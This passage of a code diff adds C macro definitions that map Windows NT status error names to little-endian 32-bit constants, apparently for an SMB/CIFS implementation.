++#define STATUS_UNRECOGNIZED_VOLUME cpu_to_le32(0xC000014F)
++#define STATUS_SERIAL_NO_DEVICE_INITED cpu_to_le32(0xC0000150)
++#define STATUS_NO_SUCH_ALIAS cpu_to_le32(0xC0000151)
++#define STATUS_MEMBER_NOT_IN_ALIAS cpu_to_le32(0xC0000152)
++#define STATUS_MEMBER_IN_ALIAS cpu_to_le32(0xC0000153)
++#define STATUS_ALIAS_EXISTS cpu_to_le32(0xC0000154)
++#define STATUS_LOGON_NOT_GRANTED cpu_to_le32(0xC0000155)
++#define STATUS_TOO_MANY_SECRETS cpu_to_le32(0xC0000156)
++#define STATUS_SECRET_TOO_LONG cpu_to_le32(0xC0000157)
++#define STATUS_INTERNAL_DB_ERROR cpu_to_le32(0xC0000158)
++#define STATUS_FULLSCREEN_MODE cpu_to_le32(0xC0000159)
++#define STATUS_TOO_MANY_CONTEXT_IDS cpu_to_le32(0xC000015A)
++#define STATUS_LOGON_TYPE_NOT_GRANTED cpu_to_le32(0xC000015B)
++#define STATUS_NOT_REGISTRY_FILE cpu_to_le32(0xC000015C)
++#define STATUS_NT_CROSS_ENCRYPTION_REQUIRED cpu_to_le32(0xC000015D)
++#define STATUS_DOMAIN_CTRLR_CONFIG_ERROR cpu_to_le32(0xC000015E)
++#define STATUS_FT_MISSING_MEMBER cpu_to_le32(0xC000015F)
++#define STATUS_ILL_FORMED_SERVICE_ENTRY cpu_to_le32(0xC0000160)
++#define STATUS_ILLEGAL_CHARACTER cpu_to_le32(0xC0000161)
++#define STATUS_UNMAPPABLE_CHARACTER cpu_to_le32(0xC0000162)
++#define STATUS_UNDEFINED_CHARACTER cpu_to_le32(0xC0000163)
++#define STATUS_FLOPPY_VOLUME cpu_to_le32(0xC0000164)
++#define STATUS_FLOPPY_ID_MARK_NOT_FOUND cpu_to_le32(0xC0000165)
++#define STATUS_FLOPPY_WRONG_CYLINDER cpu_to_le32(0xC0000166)
++#define STATUS_FLOPPY_UNKNOWN_ERROR cpu_to_le32(0xC0000167)
++#define STATUS_FLOPPY_BAD_REGISTERS cpu_to_le32(0xC0000168)
++#define STATUS_DISK_RECALIBRATE_FAILED cpu_to_le32(0xC0000169)
++#define STATUS_DISK_OPERATION_FAILED cpu_to_le32(0xC000016A)
++#define STATUS_DISK_RESET_FAILED cpu_to_le32(0xC000016B)
++#define STATUS_SHARED_IRQ_BUSY cpu_to_le32(0xC000016C)
++#define STATUS_FT_ORPHANING cpu_to_le32(0xC000016D)
++#define STATUS_BIOS_FAILED_TO_CONNECT_INTERRUPT cpu_to_le32(0xC000016E)
++#define STATUS_PARTITION_FAILURE cpu_to_le32(0xC0000172)
++#define STATUS_INVALID_BLOCK_LENGTH cpu_to_le32(0xC0000173)
++#define STATUS_DEVICE_NOT_PARTITIONED cpu_to_le32(0xC0000174)
++#define STATUS_UNABLE_TO_LOCK_MEDIA cpu_to_le32(0xC0000175)
++#define STATUS_UNABLE_TO_UNLOAD_MEDIA cpu_to_le32(0xC0000176)
++#define STATUS_EOM_OVERFLOW cpu_to_le32(0xC0000177)
++#define STATUS_NO_MEDIA cpu_to_le32(0xC0000178)
++#define STATUS_NO_SUCH_MEMBER cpu_to_le32(0xC000017A)
++#define STATUS_INVALID_MEMBER cpu_to_le32(0xC000017B)
++#define STATUS_KEY_DELETED cpu_to_le32(0xC000017C)
++#define STATUS_NO_LOG_SPACE cpu_to_le32(0xC000017D)
++#define STATUS_TOO_MANY_SIDS cpu_to_le32(0xC000017E)
++#define STATUS_LM_CROSS_ENCRYPTION_REQUIRED cpu_to_le32(0xC000017F)
++#define STATUS_KEY_HAS_CHILDREN cpu_to_le32(0xC0000180)
++#define STATUS_CHILD_MUST_BE_VOLATILE cpu_to_le32(0xC0000181)
++#define STATUS_DEVICE_CONFIGURATION_ERROR cpu_to_le32(0xC0000182)
++#define STATUS_DRIVER_INTERNAL_ERROR cpu_to_le32(0xC0000183)
++#define STATUS_INVALID_DEVICE_STATE cpu_to_le32(0xC0000184)
++#define STATUS_IO_DEVICE_ERROR cpu_to_le32(0xC0000185)
++#define STATUS_DEVICE_PROTOCOL_ERROR cpu_to_le32(0xC0000186)
++#define STATUS_BACKUP_CONTROLLER cpu_to_le32(0xC0000187)
++#define STATUS_LOG_FILE_FULL cpu_to_le32(0xC0000188)
++#define STATUS_TOO_LATE cpu_to_le32(0xC0000189)
++#define STATUS_NO_TRUST_LSA_SECRET cpu_to_le32(0xC000018A)
++#define STATUS_NO_TRUST_SAM_ACCOUNT cpu_to_le32(0xC000018B)
++#define STATUS_TRUSTED_DOMAIN_FAILURE cpu_to_le32(0xC000018C)
++#define STATUS_TRUSTED_RELATIONSHIP_FAILURE cpu_to_le32(0xC000018D)
++#define STATUS_EVENTLOG_FILE_CORRUPT cpu_to_le32(0xC000018E)
++#define STATUS_EVENTLOG_CANT_START cpu_to_le32(0xC000018F)
++#define STATUS_TRUST_FAILURE cpu_to_le32(0xC0000190)
++#define STATUS_MUTANT_LIMIT_EXCEEDED cpu_to_le32(0xC0000191)
++#define STATUS_NETLOGON_NOT_STARTED cpu_to_le32(0xC0000192)
++#define STATUS_ACCOUNT_EXPIRED cpu_to_le32(0xC0000193)
++#define STATUS_POSSIBLE_DEADLOCK cpu_to_le32(0xC0000194)
++#define STATUS_NETWORK_CREDENTIAL_CONFLICT cpu_to_le32(0xC0000195)
++#define STATUS_REMOTE_SESSION_LIMIT cpu_to_le32(0xC0000196)
++#define STATUS_EVENTLOG_FILE_CHANGED cpu_to_le32(0xC0000197)
++#define STATUS_NOLOGON_INTERDOMAIN_TRUST_ACCOUNT cpu_to_le32(0xC0000198)
++#define STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT cpu_to_le32(0xC0000199)
++#define STATUS_NOLOGON_SERVER_TRUST_ACCOUNT cpu_to_le32(0xC000019A)
++#define STATUS_DOMAIN_TRUST_INCONSISTENT cpu_to_le32(0xC000019B)
++#define STATUS_FS_DRIVER_REQUIRED cpu_to_le32(0xC000019C)
++#define STATUS_IMAGE_ALREADY_LOADED_AS_DLL cpu_to_le32(0xC000019D)
++#define STATUS_NETWORK_OPEN_RESTRICTION cpu_to_le32(0xC0000201)
++#define STATUS_NO_USER_SESSION_KEY cpu_to_le32(0xC0000202)
++#define STATUS_USER_SESSION_DELETED cpu_to_le32(0xC0000203)
++#define STATUS_RESOURCE_LANG_NOT_FOUND cpu_to_le32(0xC0000204)
++#define STATUS_INSUFF_SERVER_RESOURCES cpu_to_le32(0xC0000205)
++#define STATUS_INVALID_BUFFER_SIZE cpu_to_le32(0xC0000206)
++#define STATUS_INVALID_ADDRESS_COMPONENT cpu_to_le32(0xC0000207)
++#define STATUS_INVALID_ADDRESS_WILDCARD cpu_to_le32(0xC0000208)
++#define STATUS_TOO_MANY_ADDRESSES cpu_to_le32(0xC0000209)
++#define STATUS_ADDRESS_ALREADY_EXISTS cpu_to_le32(0xC000020A)
++#define STATUS_ADDRESS_CLOSED cpu_to_le32(0xC000020B)
++#define STATUS_CONNECTION_DISCONNECTED cpu_to_le32(0xC000020C)
++#define STATUS_CONNECTION_RESET cpu_to_le32(0xC000020D)
++#define STATUS_TOO_MANY_NODES cpu_to_le32(0xC000020E)
++#define STATUS_TRANSACTION_ABORTED cpu_to_le32(0xC000020F)
++#define STATUS_TRANSACTION_TIMED_OUT cpu_to_le32(0xC0000210)
++#define STATUS_TRANSACTION_NO_RELEASE cpu_to_le32(0xC0000211)
++#define STATUS_TRANSACTION_NO_MATCH cpu_to_le32(0xC0000212)
++#define STATUS_TRANSACTION_RESPONDED cpu_to_le32(0xC0000213)
++#define STATUS_TRANSACTION_INVALID_ID cpu_to_le32(0xC0000214)
++#define STATUS_TRANSACTION_INVALID_TYPE cpu_to_le32(0xC0000215)
++#define STATUS_NOT_SERVER_SESSION cpu_to_le32(0xC0000216)
++#define STATUS_NOT_CLIENT_SESSION cpu_to_le32(0xC0000217)
++#define STATUS_CANNOT_LOAD_REGISTRY_FILE cpu_to_le32(0xC0000218)
++#define STATUS_DEBUG_ATTACH_FAILED cpu_to_le32(0xC0000219)
++#define STATUS_SYSTEM_PROCESS_TERMINATED cpu_to_le32(0xC000021A)
++#define STATUS_DATA_NOT_ACCEPTED cpu_to_le32(0xC000021B)
++#define STATUS_NO_BROWSER_SERVERS_FOUND cpu_to_le32(0xC000021C)
++#define STATUS_VDM_HARD_ERROR cpu_to_le32(0xC000021D)
++#define STATUS_DRIVER_CANCEL_TIMEOUT cpu_to_le32(0xC000021E)
++#define STATUS_REPLY_MESSAGE_MISMATCH cpu_to_le32(0xC000021F)
++#define STATUS_MAPPED_ALIGNMENT cpu_to_le32(0xC0000220)
++#define STATUS_IMAGE_CHECKSUM_MISMATCH cpu_to_le32(0xC0000221)
++#define STATUS_LOST_WRITEBEHIND_DATA cpu_to_le32(0xC0000222)
++#define STATUS_CLIENT_SERVER_PARAMETERS_INVALID cpu_to_le32(0xC0000223)
++#define STATUS_PASSWORD_MUST_CHANGE cpu_to_le32(0xC0000224)
++#define STATUS_NOT_FOUND cpu_to_le32(0xC0000225)
++#define STATUS_NOT_TINY_STREAM cpu_to_le32(0xC0000226)
++#define STATUS_RECOVERY_FAILURE cpu_to_le32(0xC0000227)
++#define STATUS_STACK_OVERFLOW_READ cpu_to_le32(0xC0000228)
++#define STATUS_FAIL_CHECK cpu_to_le32(0xC0000229)
++#define STATUS_DUPLICATE_OBJECTID cpu_to_le32(0xC000022A)
++#define STATUS_OBJECTID_EXISTS cpu_to_le32(0xC000022B)
++#define STATUS_CONVERT_TO_LARGE cpu_to_le32(0xC000022C)
++#define STATUS_RETRY cpu_to_le32(0xC000022D)
++#define STATUS_FOUND_OUT_OF_SCOPE cpu_to_le32(0xC000022E)
++#define STATUS_ALLOCATE_BUCKET cpu_to_le32(0xC000022F)
++#define STATUS_PROPSET_NOT_FOUND cpu_to_le32(0xC0000230)
++#define STATUS_MARSHALL_OVERFLOW cpu_to_le32(0xC0000231)
++#define STATUS_INVALID_VARIANT cpu_to_le32(0xC0000232)
++#define STATUS_DOMAIN_CONTROLLER_NOT_FOUND cpu_to_le32(0xC0000233)
++#define STATUS_ACCOUNT_LOCKED_OUT cpu_to_le32(0xC0000234)
++#define STATUS_HANDLE_NOT_CLOSABLE cpu_to_le32(0xC0000235)
++#define STATUS_CONNECTION_REFUSED cpu_to_le32(0xC0000236)
++#define STATUS_GRACEFUL_DISCONNECT cpu_to_le32(0xC0000237)
++#define STATUS_ADDRESS_ALREADY_ASSOCIATED cpu_to_le32(0xC0000238)
++#define STATUS_ADDRESS_NOT_ASSOCIATED cpu_to_le32(0xC0000239)
++#define STATUS_CONNECTION_INVALID cpu_to_le32(0xC000023A)
++#define STATUS_CONNECTION_ACTIVE cpu_to_le32(0xC000023B)
++#define STATUS_NETWORK_UNREACHABLE cpu_to_le32(0xC000023C)
++#define STATUS_HOST_UNREACHABLE cpu_to_le32(0xC000023D)
++#define STATUS_PROTOCOL_UNREACHABLE cpu_to_le32(0xC000023E)
++#define STATUS_PORT_UNREACHABLE cpu_to_le32(0xC000023F)
++#define STATUS_REQUEST_ABORTED cpu_to_le32(0xC0000240)
++#define STATUS_CONNECTION_ABORTED cpu_to_le32(0xC0000241)
++#define STATUS_BAD_COMPRESSION_BUFFER cpu_to_le32(0xC0000242)
++#define STATUS_USER_MAPPED_FILE cpu_to_le32(0xC0000243)
++#define STATUS_AUDIT_FAILED cpu_to_le32(0xC0000244)
++#define STATUS_TIMER_RESOLUTION_NOT_SET cpu_to_le32(0xC0000245)
++#define STATUS_CONNECTION_COUNT_LIMIT cpu_to_le32(0xC0000246)
++#define STATUS_LOGIN_TIME_RESTRICTION cpu_to_le32(0xC0000247)
++#define STATUS_LOGIN_WKSTA_RESTRICTION cpu_to_le32(0xC0000248)
++#define STATUS_IMAGE_MP_UP_MISMATCH cpu_to_le32(0xC0000249)
++#define STATUS_INSUFFICIENT_LOGON_INFO cpu_to_le32(0xC0000250)
++#define STATUS_BAD_DLL_ENTRYPOINT cpu_to_le32(0xC0000251)
++#define STATUS_BAD_SERVICE_ENTRYPOINT cpu_to_le32(0xC0000252)
++#define STATUS_LPC_REPLY_LOST cpu_to_le32(0xC0000253)
++#define STATUS_IP_ADDRESS_CONFLICT1 cpu_to_le32(0xC0000254)
++#define STATUS_IP_ADDRESS_CONFLICT2 cpu_to_le32(0xC0000255)
++#define STATUS_REGISTRY_QUOTA_LIMIT cpu_to_le32(0xC0000256)
++#define STATUS_PATH_NOT_COVERED cpu_to_le32(0xC0000257)
++#define STATUS_NO_CALLBACK_ACTIVE cpu_to_le32(0xC0000258)
++#define STATUS_LICENSE_QUOTA_EXCEEDED cpu_to_le32(0xC0000259)
++#define STATUS_PWD_TOO_SHORT cpu_to_le32(0xC000025A)
++#define STATUS_PWD_TOO_RECENT cpu_to_le32(0xC000025B)
++#define STATUS_PWD_HISTORY_CONFLICT cpu_to_le32(0xC000025C)
++#define STATUS_PLUGPLAY_NO_DEVICE cpu_to_le32(0xC000025E)
++#define STATUS_UNSUPPORTED_COMPRESSION cpu_to_le32(0xC000025F)
++#define STATUS_INVALID_HW_PROFILE cpu_to_le32(0xC0000260)
++#define STATUS_INVALID_PLUGPLAY_DEVICE_PATH cpu_to_le32(0xC0000261)
++#define STATUS_DRIVER_ORDINAL_NOT_FOUND cpu_to_le32(0xC0000262)
++#define STATUS_DRIVER_ENTRYPOINT_NOT_FOUND cpu_to_le32(0xC0000263)
++#define STATUS_RESOURCE_NOT_OWNED cpu_to_le32(0xC0000264)
++#define STATUS_TOO_MANY_LINKS cpu_to_le32(0xC0000265)
++#define STATUS_QUOTA_LIST_INCONSISTENT cpu_to_le32(0xC0000266)
++#define STATUS_FILE_IS_OFFLINE cpu_to_le32(0xC0000267)
++#define STATUS_EVALUATION_EXPIRATION cpu_to_le32(0xC0000268)
++#define STATUS_ILLEGAL_DLL_RELOCATION cpu_to_le32(0xC0000269)
++#define STATUS_LICENSE_VIOLATION cpu_to_le32(0xC000026A)
++#define STATUS_DLL_INIT_FAILED_LOGOFF cpu_to_le32(0xC000026B)
++#define STATUS_DRIVER_UNABLE_TO_LOAD cpu_to_le32(0xC000026C)
++#define STATUS_DFS_UNAVAILABLE cpu_to_le32(0xC000026D)
++#define STATUS_VOLUME_DISMOUNTED cpu_to_le32(0xC000026E)
++#define STATUS_WX86_INTERNAL_ERROR cpu_to_le32(0xC000026F)
++#define STATUS_WX86_FLOAT_STACK_CHECK cpu_to_le32(0xC0000270)
++#define STATUS_VALIDATE_CONTINUE cpu_to_le32(0xC0000271)
++#define STATUS_NO_MATCH cpu_to_le32(0xC0000272)
++#define STATUS_NO_MORE_MATCHES cpu_to_le32(0xC0000273)
++#define STATUS_NOT_A_REPARSE_POINT cpu_to_le32(0xC0000275)
++#define STATUS_IO_REPARSE_TAG_INVALID cpu_to_le32(0xC0000276)
++#define STATUS_IO_REPARSE_TAG_MISMATCH cpu_to_le32(0xC0000277)
++#define STATUS_IO_REPARSE_DATA_INVALID cpu_to_le32(0xC0000278)
++#define STATUS_IO_REPARSE_TAG_NOT_HANDLED cpu_to_le32(0xC0000279)
++#define STATUS_REPARSE_POINT_NOT_RESOLVED cpu_to_le32(0xC0000280)
++#define STATUS_DIRECTORY_IS_A_REPARSE_POINT cpu_to_le32(0xC0000281)
++#define STATUS_RANGE_LIST_CONFLICT cpu_to_le32(0xC0000282)
++#define STATUS_SOURCE_ELEMENT_EMPTY cpu_to_le32(0xC0000283)
++#define STATUS_DESTINATION_ELEMENT_FULL cpu_to_le32(0xC0000284)
++#define STATUS_ILLEGAL_ELEMENT_ADDRESS cpu_to_le32(0xC0000285)
++#define STATUS_MAGAZINE_NOT_PRESENT cpu_to_le32(0xC0000286)
++#define STATUS_REINITIALIZATION_NEEDED cpu_to_le32(0xC0000287)
++#define STATUS_ENCRYPTION_FAILED cpu_to_le32(0xC000028A)
++#define STATUS_DECRYPTION_FAILED cpu_to_le32(0xC000028B)
++#define STATUS_RANGE_NOT_FOUND cpu_to_le32(0xC000028C)
++#define STATUS_NO_RECOVERY_POLICY cpu_to_le32(0xC000028D)
++#define STATUS_NO_EFS cpu_to_le32(0xC000028E)
++#define STATUS_WRONG_EFS cpu_to_le32(0xC000028F)
++#define STATUS_NO_USER_KEYS cpu_to_le32(0xC0000290)
++#define STATUS_FILE_NOT_ENCRYPTED cpu_to_le32(0xC0000291)
++#define STATUS_NOT_EXPORT_FORMAT cpu_to_le32(0xC0000292)
++#define STATUS_FILE_ENCRYPTED cpu_to_le32(0xC0000293)
++#define STATUS_WMI_GUID_NOT_FOUND cpu_to_le32(0xC0000295)
++#define STATUS_WMI_INSTANCE_NOT_FOUND cpu_to_le32(0xC0000296)
++#define STATUS_WMI_ITEMID_NOT_FOUND cpu_to_le32(0xC0000297)
++#define STATUS_WMI_TRY_AGAIN cpu_to_le32(0xC0000298)
++#define STATUS_SHARED_POLICY cpu_to_le32(0xC0000299)
++#define STATUS_POLICY_OBJECT_NOT_FOUND cpu_to_le32(0xC000029A)
++#define STATUS_POLICY_ONLY_IN_DS cpu_to_le32(0xC000029B)
++#define STATUS_VOLUME_NOT_UPGRADED cpu_to_le32(0xC000029C)
++#define STATUS_REMOTE_STORAGE_NOT_ACTIVE cpu_to_le32(0xC000029D)
++#define STATUS_REMOTE_STORAGE_MEDIA_ERROR cpu_to_le32(0xC000029E)
++#define STATUS_NO_TRACKING_SERVICE cpu_to_le32(0xC000029F)
++#define STATUS_SERVER_SID_MISMATCH cpu_to_le32(0xC00002A0)
++#define STATUS_DS_NO_ATTRIBUTE_OR_VALUE cpu_to_le32(0xC00002A1)
++#define STATUS_DS_INVALID_ATTRIBUTE_SYNTAX cpu_to_le32(0xC00002A2)
++#define STATUS_DS_ATTRIBUTE_TYPE_UNDEFINED cpu_to_le32(0xC00002A3)
++#define STATUS_DS_ATTRIBUTE_OR_VALUE_EXISTS cpu_to_le32(0xC00002A4)
++#define STATUS_DS_BUSY cpu_to_le32(0xC00002A5)
++#define STATUS_DS_UNAVAILABLE cpu_to_le32(0xC00002A6)
++#define STATUS_DS_NO_RIDS_ALLOCATED cpu_to_le32(0xC00002A7)
++#define STATUS_DS_NO_MORE_RIDS cpu_to_le32(0xC00002A8)
++#define STATUS_DS_INCORRECT_ROLE_OWNER cpu_to_le32(0xC00002A9)
++#define STATUS_DS_RIDMGR_INIT_ERROR cpu_to_le32(0xC00002AA)
++#define STATUS_DS_OBJ_CLASS_VIOLATION cpu_to_le32(0xC00002AB)
++#define STATUS_DS_CANT_ON_NON_LEAF cpu_to_le32(0xC00002AC)
++#define STATUS_DS_CANT_ON_RDN cpu_to_le32(0xC00002AD)
++#define STATUS_DS_CANT_MOD_OBJ_CLASS cpu_to_le32(0xC00002AE)
++#define STATUS_DS_CROSS_DOM_MOVE_FAILED cpu_to_le32(0xC00002AF)
++#define STATUS_DS_GC_NOT_AVAILABLE cpu_to_le32(0xC00002B0)
++#define STATUS_DIRECTORY_SERVICE_REQUIRED cpu_to_le32(0xC00002B1)
++#define STATUS_REPARSE_ATTRIBUTE_CONFLICT cpu_to_le32(0xC00002B2)
++#define STATUS_CANT_ENABLE_DENY_ONLY cpu_to_le32(0xC00002B3)
++#define STATUS_FLOAT_MULTIPLE_FAULTS cpu_to_le32(0xC00002B4)
++#define STATUS_FLOAT_MULTIPLE_TRAPS cpu_to_le32(0xC00002B5)
++#define STATUS_DEVICE_REMOVED cpu_to_le32(0xC00002B6)
++#define STATUS_JOURNAL_DELETE_IN_PROGRESS cpu_to_le32(0xC00002B7)
++#define STATUS_JOURNAL_NOT_ACTIVE cpu_to_le32(0xC00002B8)
++#define STATUS_NOINTERFACE cpu_to_le32(0xC00002B9)
++#define STATUS_DS_ADMIN_LIMIT_EXCEEDED cpu_to_le32(0xC00002C1)
++#define STATUS_DRIVER_FAILED_SLEEP cpu_to_le32(0xC00002C2)
++#define STATUS_MUTUAL_AUTHENTICATION_FAILED cpu_to_le32(0xC00002C3)
++#define STATUS_CORRUPT_SYSTEM_FILE cpu_to_le32(0xC00002C4)
++#define STATUS_DATATYPE_MISALIGNMENT_ERROR cpu_to_le32(0xC00002C5)
++#define STATUS_WMI_READ_ONLY cpu_to_le32(0xC00002C6)
++#define STATUS_WMI_SET_FAILURE cpu_to_le32(0xC00002C7)
++#define STATUS_COMMITMENT_MINIMUM cpu_to_le32(0xC00002C8)
++#define STATUS_REG_NAT_CONSUMPTION cpu_to_le32(0xC00002C9)
++#define STATUS_TRANSPORT_FULL cpu_to_le32(0xC00002CA)
++#define STATUS_DS_SAM_INIT_FAILURE cpu_to_le32(0xC00002CB)
++#define STATUS_ONLY_IF_CONNECTED cpu_to_le32(0xC00002CC)
++#define STATUS_DS_SENSITIVE_GROUP_VIOLATION cpu_to_le32(0xC00002CD)
++#define STATUS_PNP_RESTART_ENUMERATION cpu_to_le32(0xC00002CE)
++#define STATUS_JOURNAL_ENTRY_DELETED cpu_to_le32(0xC00002CF)
++#define STATUS_DS_CANT_MOD_PRIMARYGROUPID cpu_to_le32(0xC00002D0)
++#define STATUS_SYSTEM_IMAGE_BAD_SIGNATURE cpu_to_le32(0xC00002D1)
++#define STATUS_PNP_REBOOT_REQUIRED cpu_to_le32(0xC00002D2)
++#define STATUS_POWER_STATE_INVALID cpu_to_le32(0xC00002D3)
++#define STATUS_DS_INVALID_GROUP_TYPE cpu_to_le32(0xC00002D4)
++#define STATUS_DS_NO_NEST_GLOBALGROUP_IN_MIXEDDOMAIN cpu_to_le32(0xC00002D5)
++#define STATUS_DS_NO_NEST_LOCALGROUP_IN_MIXEDDOMAIN cpu_to_le32(0xC00002D6)
++#define STATUS_DS_GLOBAL_CANT_HAVE_LOCAL_MEMBER cpu_to_le32(0xC00002D7)
++#define STATUS_DS_GLOBAL_CANT_HAVE_UNIVERSAL_MEMBER cpu_to_le32(0xC00002D8)
++#define STATUS_DS_UNIVERSAL_CANT_HAVE_LOCAL_MEMBER cpu_to_le32(0xC00002D9)
++#define STATUS_DS_GLOBAL_CANT_HAVE_CROSSDOMAIN_MEMBER cpu_to_le32(0xC00002DA)
++#define STATUS_DS_LOCAL_CANT_HAVE_CROSSDOMAIN_LOCAL_MEMBER	\
++	cpu_to_le32(0xC00002DB)
++#define STATUS_DS_HAVE_PRIMARY_MEMBERS cpu_to_le32(0xC00002DC)
++#define STATUS_WMI_NOT_SUPPORTED cpu_to_le32(0xC00002DD)
++#define STATUS_INSUFFICIENT_POWER cpu_to_le32(0xC00002DE)
++#define STATUS_SAM_NEED_BOOTKEY_PASSWORD cpu_to_le32(0xC00002DF)
++#define STATUS_SAM_NEED_BOOTKEY_FLOPPY cpu_to_le32(0xC00002E0)
++#define STATUS_DS_CANT_START cpu_to_le32(0xC00002E1)
++#define STATUS_DS_INIT_FAILURE cpu_to_le32(0xC00002E2)
++#define STATUS_SAM_INIT_FAILURE cpu_to_le32(0xC00002E3)
++#define STATUS_DS_GC_REQUIRED cpu_to_le32(0xC00002E4)
++#define STATUS_DS_LOCAL_MEMBER_OF_LOCAL_ONLY cpu_to_le32(0xC00002E5)
++#define STATUS_DS_NO_FPO_IN_UNIVERSAL_GROUPS cpu_to_le32(0xC00002E6)
++#define STATUS_DS_MACHINE_ACCOUNT_QUOTA_EXCEEDED cpu_to_le32(0xC00002E7)
++#define STATUS_MULTIPLE_FAULT_VIOLATION cpu_to_le32(0xC00002E8)
++#define STATUS_CURRENT_DOMAIN_NOT_ALLOWED cpu_to_le32(0xC00002E9)
++#define STATUS_CANNOT_MAKE cpu_to_le32(0xC00002EA)
++#define STATUS_SYSTEM_SHUTDOWN cpu_to_le32(0xC00002EB)
++#define STATUS_DS_INIT_FAILURE_CONSOLE cpu_to_le32(0xC00002EC)
++#define STATUS_DS_SAM_INIT_FAILURE_CONSOLE cpu_to_le32(0xC00002ED)
++#define STATUS_UNFINISHED_CONTEXT_DELETED cpu_to_le32(0xC00002EE)
++#define STATUS_NO_TGT_REPLY cpu_to_le32(0xC00002EF)
++#define STATUS_OBJECTID_NOT_FOUND cpu_to_le32(0xC00002F0)
++#define STATUS_NO_IP_ADDRESSES cpu_to_le32(0xC00002F1)
++#define STATUS_WRONG_CREDENTIAL_HANDLE cpu_to_le32(0xC00002F2)
++#define STATUS_CRYPTO_SYSTEM_INVALID cpu_to_le32(0xC00002F3)
++#define STATUS_MAX_REFERRALS_EXCEEDED cpu_to_le32(0xC00002F4)
++#define STATUS_MUST_BE_KDC cpu_to_le32(0xC00002F5)
++#define STATUS_STRONG_CRYPTO_NOT_SUPPORTED cpu_to_le32(0xC00002F6)
++#define STATUS_TOO_MANY_PRINCIPALS cpu_to_le32(0xC00002F7)
++#define STATUS_NO_PA_DATA cpu_to_le32(0xC00002F8)
++#define STATUS_PKINIT_NAME_MISMATCH cpu_to_le32(0xC00002F9)
++#define STATUS_SMARTCARD_LOGON_REQUIRED cpu_to_le32(0xC00002FA)
++#define STATUS_KDC_INVALID_REQUEST cpu_to_le32(0xC00002FB)
++#define STATUS_KDC_UNABLE_TO_REFER cpu_to_le32(0xC00002FC)
++#define STATUS_KDC_UNKNOWN_ETYPE cpu_to_le32(0xC00002FD)
++#define STATUS_SHUTDOWN_IN_PROGRESS cpu_to_le32(0xC00002FE)
++#define STATUS_SERVER_SHUTDOWN_IN_PROGRESS cpu_to_le32(0xC00002FF)
++#define STATUS_NOT_SUPPORTED_ON_SBS cpu_to_le32(0xC0000300)
++#define STATUS_WMI_GUID_DISCONNECTED cpu_to_le32(0xC0000301)
++#define STATUS_WMI_ALREADY_DISABLED cpu_to_le32(0xC0000302)
++#define STATUS_WMI_ALREADY_ENABLED cpu_to_le32(0xC0000303)
++#define STATUS_MFT_TOO_FRAGMENTED cpu_to_le32(0xC0000304)
++#define STATUS_COPY_PROTECTION_FAILURE cpu_to_le32(0xC0000305)
++#define STATUS_CSS_AUTHENTICATION_FAILURE cpu_to_le32(0xC0000306)
++#define STATUS_CSS_KEY_NOT_PRESENT cpu_to_le32(0xC0000307)
++#define STATUS_CSS_KEY_NOT_ESTABLISHED cpu_to_le32(0xC0000308)
++#define STATUS_CSS_SCRAMBLED_SECTOR cpu_to_le32(0xC0000309)
++#define STATUS_CSS_REGION_MISMATCH cpu_to_le32(0xC000030A)
++#define STATUS_CSS_RESETS_EXHAUSTED cpu_to_le32(0xC000030B)
++#define STATUS_PKINIT_FAILURE cpu_to_le32(0xC0000320)
++#define STATUS_SMARTCARD_SUBSYSTEM_FAILURE cpu_to_le32(0xC0000321)
++#define STATUS_NO_KERB_KEY cpu_to_le32(0xC0000322)
++#define STATUS_HOST_DOWN cpu_to_le32(0xC0000350)
++#define STATUS_UNSUPPORTED_PREAUTH cpu_to_le32(0xC0000351)
++#define STATUS_EFS_ALG_BLOB_TOO_BIG cpu_to_le32(0xC0000352)
++#define STATUS_PORT_NOT_SET cpu_to_le32(0xC0000353)
++#define STATUS_DEBUGGER_INACTIVE cpu_to_le32(0xC0000354)
++#define STATUS_DS_VERSION_CHECK_FAILURE cpu_to_le32(0xC0000355)
++#define STATUS_AUDITING_DISABLED cpu_to_le32(0xC0000356)
++#define STATUS_PRENT4_MACHINE_ACCOUNT cpu_to_le32(0xC0000357)
++#define STATUS_DS_AG_CANT_HAVE_UNIVERSAL_MEMBER cpu_to_le32(0xC0000358)
++#define STATUS_INVALID_IMAGE_WIN_32 cpu_to_le32(0xC0000359)
++#define STATUS_INVALID_IMAGE_WIN_64 cpu_to_le32(0xC000035A)
++#define STATUS_BAD_BINDINGS cpu_to_le32(0xC000035B)
++#define STATUS_NETWORK_SESSION_EXPIRED cpu_to_le32(0xC000035C)
++#define STATUS_APPHELP_BLOCK cpu_to_le32(0xC000035D)
++#define STATUS_ALL_SIDS_FILTERED cpu_to_le32(0xC000035E)
++#define STATUS_NOT_SAFE_MODE_DRIVER cpu_to_le32(0xC000035F)
++#define STATUS_ACCESS_DISABLED_BY_POLICY_DEFAULT cpu_to_le32(0xC0000361)
++#define STATUS_ACCESS_DISABLED_BY_POLICY_PATH cpu_to_le32(0xC0000362)
++#define STATUS_ACCESS_DISABLED_BY_POLICY_PUBLISHER cpu_to_le32(0xC0000363)
++#define STATUS_ACCESS_DISABLED_BY_POLICY_OTHER cpu_to_le32(0xC0000364)
++#define STATUS_FAILED_DRIVER_ENTRY cpu_to_le32(0xC0000365)
++#define STATUS_DEVICE_ENUMERATION_ERROR cpu_to_le32(0xC0000366)
++#define STATUS_MOUNT_POINT_NOT_RESOLVED cpu_to_le32(0xC0000368)
++#define STATUS_INVALID_DEVICE_OBJECT_PARAMETER cpu_to_le32(0xC0000369)
++#define STATUS_MCA_OCCURRED cpu_to_le32(0xC000036A)
++#define STATUS_DRIVER_BLOCKED_CRITICAL cpu_to_le32(0xC000036B)
++#define STATUS_DRIVER_BLOCKED cpu_to_le32(0xC000036C)
++#define STATUS_DRIVER_DATABASE_ERROR cpu_to_le32(0xC000036D)
++#define STATUS_SYSTEM_HIVE_TOO_LARGE cpu_to_le32(0xC000036E)
++#define STATUS_INVALID_IMPORT_OF_NON_DLL cpu_to_le32(0xC000036F)
++#define STATUS_NO_SECRETS cpu_to_le32(0xC0000371)
++#define STATUS_ACCESS_DISABLED_NO_SAFER_UI_BY_POLICY cpu_to_le32(0xC0000372)
++#define STATUS_FAILED_STACK_SWITCH cpu_to_le32(0xC0000373)
++#define STATUS_HEAP_CORRUPTION cpu_to_le32(0xC0000374)
++#define STATUS_SMARTCARD_WRONG_PIN cpu_to_le32(0xC0000380)
++#define STATUS_SMARTCARD_CARD_BLOCKED cpu_to_le32(0xC0000381)
++#define STATUS_SMARTCARD_CARD_NOT_AUTHENTICATED cpu_to_le32(0xC0000382)
